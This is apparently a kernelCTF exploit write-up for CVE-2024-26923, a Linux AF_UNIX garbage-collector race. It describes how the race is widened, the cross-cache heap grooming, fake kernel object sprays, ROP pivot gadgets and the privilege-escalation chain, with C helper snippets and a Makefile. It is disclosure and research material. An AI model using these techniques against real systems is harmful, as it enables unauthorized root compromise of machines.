pocs/linux/kernelctf/CVE-2024-26923_lts_cos/docs/exploit.md

## Triggering the race condition
The exploit sets up a listening server socket, a client socket to connect to it, and a separate "victim" socket that will eventually be corrupted. During the client's connect() call, the kernel dynamically allocates a new socket (the "embryo") to represent the server's side of the connection.

In this vulnerability we have two race windows.
The first one is in unix_stream_connect():

```
static int unix_stream_connect(struct socket *sock, struct sockaddr *uaddr,
int addr_len, int flags)
{
...

unix_peer(sk) = newsk;

[window 1 start]
unix_state_unlock(sk);

/* take ten and send info to listening sock */
spin_lock(&other->sk_receive_queue.lock);
[window 1 end]

__skb_queue_tail(&other->sk_receive_queue, skb);
spin_unlock(&other->sk_receive_queue.lock);
...
```

This function is triggered by executing connect() on CPU 0. To win the race, the exploit intentionally stalls this thread right inside window 1, leaving the newly created "embryo" socket (newsk) allocated but not yet linked to the receive queue. This CPU will do nothing else until the race-condition part of the exploit is over.

We have to use the other CPU available to perform 3 operations during this window:

1. Send the victim socket through this connecting socket, using SCM_RIGHTS to make it an 'inflight' socket, which forces the garbage collector to track it.
> Note: SCM_RIGHTS is a special message type that allows unix sockets to send open file descriptors to each other. When a socket is sent this way but hasn't been read out of the queue yet, it is considered "inflight". The garbage collector specifically tracks inflight sockets to prevent cyclic memory leaks.

2. Close the victim socket, so that its standard file reference count drops to zero, leaving only the garbage collector's internal references.

3. Trigger garbage collection by closing an unrelated socket, which forces `unix_gc()` to wake up and scan the inflight list; `unix_gc()` then runs until the start of window 2.


If we start too early, the send fails because the client socket is not connected yet, and the exploit attempt is lost.
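Step 1 above relies on SCM_RIGHTS fd passing. Here is a minimal userland sketch of sending and receiving a file descriptor over an AF_UNIX socket; the helper names `send_fd`/`recv_fd` are illustrative, not taken from the exploit:

```c
#include <assert.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <unistd.h>

/* Send fd over a connected AF_UNIX socket via SCM_RIGHTS.
 * While the message sits unread in the receive queue, the kernel
 * counts the passed socket as "inflight". */
static int send_fd(int sock, int fd)
{
	char data = 'x';
	struct iovec iov = { .iov_base = &data, .iov_len = 1 };
	char cbuf[CMSG_SPACE(sizeof(int))];
	struct msghdr msg = {
		.msg_iov = &iov, .msg_iovlen = 1,
		.msg_control = cbuf, .msg_controllen = sizeof(cbuf),
	};
	struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);

	cmsg->cmsg_level = SOL_SOCKET;
	cmsg->cmsg_type = SCM_RIGHTS;
	cmsg->cmsg_len = CMSG_LEN(sizeof(int));
	memcpy(CMSG_DATA(cmsg), &fd, sizeof(int));
	return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Receive the passed fd; this is what later drops the victim's
 * inflight count back down. Returns the new fd or -1. */
static int recv_fd(int sock)
{
	char data;
	struct iovec iov = { .iov_base = &data, .iov_len = 1 };
	char cbuf[CMSG_SPACE(sizeof(int))];
	struct msghdr msg = {
		.msg_iov = &iov, .msg_iovlen = 1,
		.msg_control = cbuf, .msg_controllen = sizeof(cbuf),
	};
	struct cmsghdr *cmsg;
	int fd;

	if (recvmsg(sock, &msg, 0) != 1)
		return -1;
	cmsg = CMSG_FIRSTHDR(&msg);
	if (!cmsg || cmsg->cmsg_type != SCM_RIGHTS)
		return -1;
	memcpy(&fd, CMSG_DATA(cmsg), sizeof(int));
	return fd;
}
```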

The second window is in the `unix_gc()` function:
```
void unix_gc(void)
{
	...
	list_for_each_entry(u, &gc_candidates, link)
		scan_children(&u->sk, dec_inflight, NULL);

	[window 2 start]
	/* Restore the references for children of all candidates,
	 * which have remaining references. Do this recursively, so
	 * only those remain, which form cyclic references.
	 *
	 * Use a "cursor" link, to make the list traversal safe, even
	 * though elements might be moved about.
	 */
	list_add(&cursor, &gc_candidates);
	[window 2 end]
	while (cursor.next != &gc_candidates) {
		u = list_entry(cursor.next, struct unix_sock, link);

		/* Move cursor to after the current position. */
		list_move(&cursor, &u->link);

		if (atomic_long_read(&u->inflight) > 0) {
			list_move_tail(&u->link, &not_cycle_list);
			__clear_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);
			scan_children(&u->sk, inc_inflight_move_tail, NULL);
		}
	}
	list_del(&cursor);
	...
}
```

For the vulnerability to be triggered, two conditions have to be met:
1. The first scan_children() must not see the embryo in the receive queue of the server socket.
2. The second scan_children() has to see the embryo.

This causes a decrement/increment mismatch and the resulting use-after-free. Because the garbage collector does not expect an embryo to be enqueued mid-scan, it misses the embryo during the first pass (failing to decrement the victim's `u->inflight` counter). When the stalled thread unfreezes, the embryo is enqueued; the GC sees it during the second pass and increments the victim's count. The victim's inflight count is now artificially inflated, leaving a dangling pointer in the gc_inflight_list when the socket is closed.


In other words, window 2 has run inside window 1 of unix_stream_connect().


To have a chance of aligning the two threads correctly we have to extend both race windows as much as possible.
To do that we use a well-known timerfd technique invented by Jann Horn.
The basic idea is to set an hrtimer-based timerfd to trigger a timer interrupt during our race window and attach a lot (as much as RLIMIT_NOFILE allows)
of epoll watches to this timerfd. When the timer fires, the kernel is forced to slowly iterate over hundreds of these watchers inside the interrupt handler, artificially stretching the race window from nanoseconds to milliseconds.

For more details see the original [blog post](https://googleprojectzero.blogspot.com/2022/03/racing-against-clock-hitting-tiny.html).

Here's the triggering sequence (we use 2 CPUs; CPU 1 executes the child_send() thread):

| CPU 0 | CPU 1 |
| -------- | -------- |
| arms timer 1 to trigger after a delay | - |
| calls connect() on the client socket | - |
| unix_stream_connect() runs until the start of window 1 | - |
| timer 1 is triggered during window 1 | - |
| timer goes through all epoll notifications | sends victim socket through the client socket |
| ... | closes victim socket |
| ... | arms timer 2 to trigger after a delay |
| ... | closes another socket to trigger unix_gc() |
| ... | unix_gc() runs until the start of window 2 |
| ... | timer 2 is triggered during window 2 |
| timer 1 handler ends | timer goes through all epoll notifications |
| window 1 ends, embryo is added to the receive queue | ... |
| - | timer 2 handler ends, window 2 ends |
| - | second scan_children() executes inc_inflight_move_tail() on the victim socket |

## Exploiting the use-after-free

At this point our victim socket is inflight, linked in the gc_inflight_list, and has an inflight reference value of 2 (stored inside the struct unix_sock).


The next step is to receive this socket and close it. Receiving it drops the inflight count from 2 down to 1, and closing it drops its standard file reference count to 0. This causes its struct sock object to be freed, but it stays referenced in the gc_inflight_list.


In the case of unix sockets, struct sock is allocated from a separate kmem cache called 'UNIX'. On our target one slab takes an order-2 page (size 0x4000) and fits 15 objects.

To be able to exploit the use-after-free we have to cause the slab containing our victim object to be discarded and returned to the page allocator.
This is done using standard cross-cache techniques:
1. Free all objects of the given slab
2. Create a lot of partial slabs to unfreeze the empty slab and force the kernel to flush it out and discard it.
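The spray-and-free half of these steps can be sketched as follows — a simplified skeleton assuming the 15-objects-per-slab geometry described above; the helper names are illustrative, and the real exploit additionally controls exactly which slab the victim object lands in:

```c
#include <assert.h>
#include <sys/socket.h>
#include <unistd.h>

#define OBJS_PER_SLAB 15	/* UNIX cache: order-2 slab, 15 objects */
#define NSLABS 8

/* Spray enough AF_UNIX sockets to fill several UNIX slabs, so a
 * whole slab's worth of objects belongs to us. */
static int spray_unix(int fds[NSLABS * OBJS_PER_SLAB])
{
	for (int i = 0; i < NSLABS * OBJS_PER_SLAB; i++) {
		fds[i] = socket(AF_UNIX, SOCK_STREAM, 0);
		if (fds[i] < 0)
			return -1;
	}
	return 0;
}

/* Step 1: free every object of one slab. Step 2 (creating partial
 * slabs so the now-empty slab is unfrozen and discarded) is driven
 * in the real exploit by further allocations and frees. */
static void free_one_slab(int fds[], int slab)
{
	for (int i = 0; i < OBJS_PER_SLAB; i++)
		close(fds[slab * OBJS_PER_SLAB + i]);
}
```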


However, in this case we need maximum reliability - winning the race is such a rare event that we can't afford to make mistakes in the later stages of the exploit.

Because of this we used the /proc/zoneinfo parsing technique to establish a known UNIX cache state before starting the exploit attempt. By monitoring the raw page allocation counters in /proc/zoneinfo, we can observe exactly when the cache grabs a fresh page from the system.

This is done in the get_fresh_unix() function.
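A minimal sketch of the counter sampling (the parsing approach and the helper name `zone_free_pages` are illustrative; the actual get_fresh_unix() logic lives in the exploit source):

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Read the "pages free" counter of the first populated zone from
 * /proc/zoneinfo. The exploit samples this before and after an
 * allocation: a drop of 4 pages signals that the slab allocator
 * just grabbed a fresh order-2 page for the target cache. */
static long zone_free_pages(void)
{
	FILE *f = fopen("/proc/zoneinfo", "r");
	char line[256];
	long pages = -1;

	if (!f)
		return -1;
	while (fgets(line, sizeof(line), f)) {
		char *p = strstr(line, "pages free");
		long v;

		/* Skip empty zones; keep the first populated one. */
		if (p && sscanf(p, "pages free %ld", &v) == 1 && v > 0) {
			pages = v;
			break;
		}
	}
	fclose(f);
	return pages;
}
```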
One problem that we have to solve is that when a unix socket is allocated, an allocation is also made from sock_inode_cache, which uses slabs of the same size (0x4000) as the UNIX cache, causing issues with detecting a new UNIX slab.


To solve this we first allocate some netlink sockets, which do not have their own dedicated sock object cache, so the only order-2 page allocation comes from sock_inode_cache.
This allows us to get a fresh sock_inode_cache slab first and then proceed with unix socket allocations to get a fresh UNIX slab.

After the slab page is returned to the page allocator we can easily reallocate it using an xattr of size 0x4000 - xattrs larger than 0x2000 are allocated directly from the page allocator.

## Getting RIP control

At this point we have a struct sock object linked in the gc_inflight_list that we can fill with arbitrary data.
This list is used by unix_gc(). If we craft a fake sock object convincing enough, unix_gc() will traverse the gc_inflight_list and move sk_buff objects from our sock object to the 'hitlist' that is then passed to skb_queue_purge().

unix_gc() uses list handling functions to move the victim object between lists multiple times, and CONFIG_DEBUG_LIST is on, so our object has to have valid prev/next list pointers. Because the kernel strictly verifies list integrity (e.g., node->next->prev == node), these pointers cannot be dummy values; they must be precisely calculated to interlock with the kernel's actual gc_inflight_list to avoid a panic.

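To illustrate the CONFIG_DEBUG_LIST constraint, here is the invariant the fake object's link field has to satisfy — a userland model, not the kernel's actual structures:

```c
#include <assert.h>

/* Userland model of the kernel's doubly-linked list_head. */
struct list_head { struct list_head *next, *prev; };

/* The checks CONFIG_DEBUG_LIST performs before an unlink or move:
 * both neighbours must point back at the node. */
static int debug_list_valid(struct list_head *node)
{
	return node->next->prev == node && node->prev->next == node;
}

/* Interlock a fake node between two existing entries. In the
 * exploit, the real gc_inflight_list neighbours already point at
 * the victim's old address, which the sprayed fake object now
 * occupies, so only fake->next/fake->prev have to be computed. */
static void interlock(struct list_head *fake,
		      struct list_head *prev, struct list_head *next)
{
	fake->prev = prev;
	fake->next = next;
	prev->next = fake;
	next->prev = fake;
}
```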
Also, properties such as sk_socket->file are accessed, meaning we also have to craft related objects (or at least parts of them) like struct socket, struct file, struct inode and finally sk_buff - the last one contains the function pointer giving us RIP control and the ROP chain.

But first, we need a place with a known address to store all these objects.

### Crafting objects in kernel memory

The fake kernel objects were sprayed into the physical memory by creating a lot of large tmpfs xattrs and referenced by using a direct mapping address - more details about that can be found in the [novel techniques](novel-techniques.md) section.

The first fake socket to replace the victim object on the gc_inflight_list is prepared in prepare_sock() and has pointers to the ones prepared in prepare_more_socks(). These are actually allocated at the very beginning of the exploit - we can do it because their location in memory is known in advance.

### Triggering the sk_buff destructor to get RIP control

When an inflight socket is chosen to be released by unix_gc(), the sk_buff carrying it is removed from the sk_receive_queue and linked into the 'hitlist', and then skb_queue_purge() is called on that list:
```
static inline void __skb_queue_purge(struct sk_buff_head *list)
{
struct sk_buff *skb;
while ((skb = __skb_dequeue(list)) != NULL)
kfree_skb(skb);
}
```

If this is the last reference to a given skb, skb_release_head_state() is eventually called:
```
void skb_release_head_state(struct sk_buff *skb)
{
skb_dst_drop(skb);
if (skb->destructor) {
DEBUG_NET_WARN_ON_ONCE(in_hardirq());
skb->destructor(skb);
}
#if IS_ENABLED(CONFIG_NF_CONNTRACK)
nf_conntrack_put(skb_nfct(skb));
#endif
skb_ext_put(skb);
}
```

Because we control all the contents of the sk_buff object we can make sure the destructor will be called.

## Pivot to ROP

When the destructor is called, RDI contains a pointer to our fake sk_buff object.
The first 16 bytes of this object are used by the list head, so we can't start our ROP chain there.

The following chain of gadgets allows us to pivot to rdi+0x10, where our ROP chain starts:

```
mov r8,QWORD PTR [rdi+0xc8]
mov eax,0x1
test r8,r8
je 0xffffffff8218aac1
mov rsi,rdi
mov rcx,r14
mov rdi,rbp
mov rdx,r15
call 0xffffffff8242ca60 <__x86_indirect_thunk_r8>
```

This copies RDI to RSI.

```
push rsi
jmp qword [rsi-0x70]
```

This pushes RSI onto the stack. We can safely use the -0x70 offset because our sk_buff is part of a larger allocation.

Finally:

```
pop rsp
pop rbp
pop rbx
ret
```

The two pops at the end move RSP past the list_head at the start of the sk_buff.

## Second pivot

There is not much space at the beginning of the sk_buff - the next field used by the kernel is at offset 0x38, so we have room for only 3 gadgets, but this is enough to pivot to a larger area with a simple pop rsp ; ret.

## Privilege escalation

The second stage of the ROP chain performs the standard commit_creds(init_cred); switch_task_namespaces(pid, init_nsproxy); sequence and returns to userspace.
pocs/linux/kernelctf/CVE-2024-26923_lts_cos/docs/novel-techniques.md

### Storing objects under a known address in kernel memory

There's a surprisingly simple way to store an almost unlimited amount of data at a known kernel address, which makes tricks like using cpu_entry_area obsolete.

All data stored in the memory is accessible in kernel mode via direct physical memory mapping.
Virtual address of an object is the start of the direct mapping (page_offset_base) plus an offset based on the PFN of the physical page.
Physical memory addresses of heap slabs or user memory are easily predicted - only kernel code/data sections are randomized.
Even if everything were randomized, we could just spray most of the physical memory with our payload, defeating any such mitigation.
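The address calculation above is simple arithmetic — a sketch assuming 4 KiB pages; the page_offset_base value in the test below is an illustrative example, not a leaked address:

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_SHIFT 12	/* 4 KiB pages */

/* Virtual address of a physical page in the direct mapping:
 * the randomized base of the mapping plus the page frame number
 * (PFN) times the page size. */
static uint64_t direct_map_addr(uint64_t page_offset_base, uint64_t pfn)
{
	return page_offset_base + (pfn << PAGE_SHIFT);
}
```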

page_offset_base is randomized, but on systems with PTI disabled we can use a side-channel technique like prefetch to leak this address, the same way we do with the start of the kernel code section.

There are many ways to store data in memory - I prefer using large xattrs on tmpfs.
The maximum size of one xattr is 0xffff bytes, and allocations over 0x2000 bytes are served directly from the page allocator.
pocs/linux/kernelctf/CVE-2024-26923_lts_cos/docs/vulnerability.md

## Requirements to trigger the vulnerability

- Kernel configuration: CONFIG_UNIX
- User namespaces required: no

## Commit which introduced the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1fd05ba5a2f2aa8e7b9b52ef55df850e2e7d54c9

## Commit which fixed the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=47d8ac011fe1c9251070e1bd64cb10b48193ec51

## Affected kernel versions

Introduced in 3.0. Fixed in 6.1.87, 6.6.28 and other stable trees.

## Affected component, subsystem

net/unix

## Description

The garbage collector does not take into account the risk of an embryo getting
enqueued during the garbage collection. If such an embryo has a peer that
carries SCM_RIGHTS, two consecutive passes of scan_children() may see a
different set of children, leading to an incorrectly elevated inflight
count and then a dangling pointer within the gc_inflight_list.

All sockets are AF_UNIX/SOCK_STREAM:
- S is an unconnected socket
- L is a listening in-flight socket bound to addr, not in fdtable
- V's fd will be passed via sendmsg(), gets inflight count bumped

```
connect(S, addr) sendmsg(S, [V]); close(V) __unix_gc()
---------------- ------------------------- -----------

NS = unix_create1()
skb1 = sock_wmalloc(NS)
L = unix_find_other(addr)
unix_state_lock(L)
unix_peer(S) = NS


// V count=1 inflight=0

NS = unix_peer(S)
skb2 = sock_alloc()
skb_queue_tail(NS, skb2[V])

// V became in-flight
// V count=2 inflight=1

close(V)

// V count=1 inflight=1
// GC candidate condition met

for u in gc_inflight_list:
if (total_refs == inflight_refs)
add u to gc_candidates

// gc_candidates={L, V}

for u in gc_candidates:
scan_children(u, dec_inflight)

// embryo (skb1) was not
// reachable from L yet, so V's
// inflight remains unchanged


__skb_queue_tail(L, skb1)
unix_state_unlock(L)


for u in gc_candidates:
if (u.inflight)
scan_children(u, inc_inflight_move_tail)

// V count=1 inflight=2 (!)

```
Makefile

INCLUDES =
LIBS = -pthread -ldl
CFLAGS = -fomit-frame-pointer -static -fcf-protection=none

exploit: exploit.c kernelver_17800.147.54.h
gcc -o $@ exploit.c $(INCLUDES) $(CFLAGS) $(LIBS)

prerequisites:
sudo apt-get install libkeyutils-dev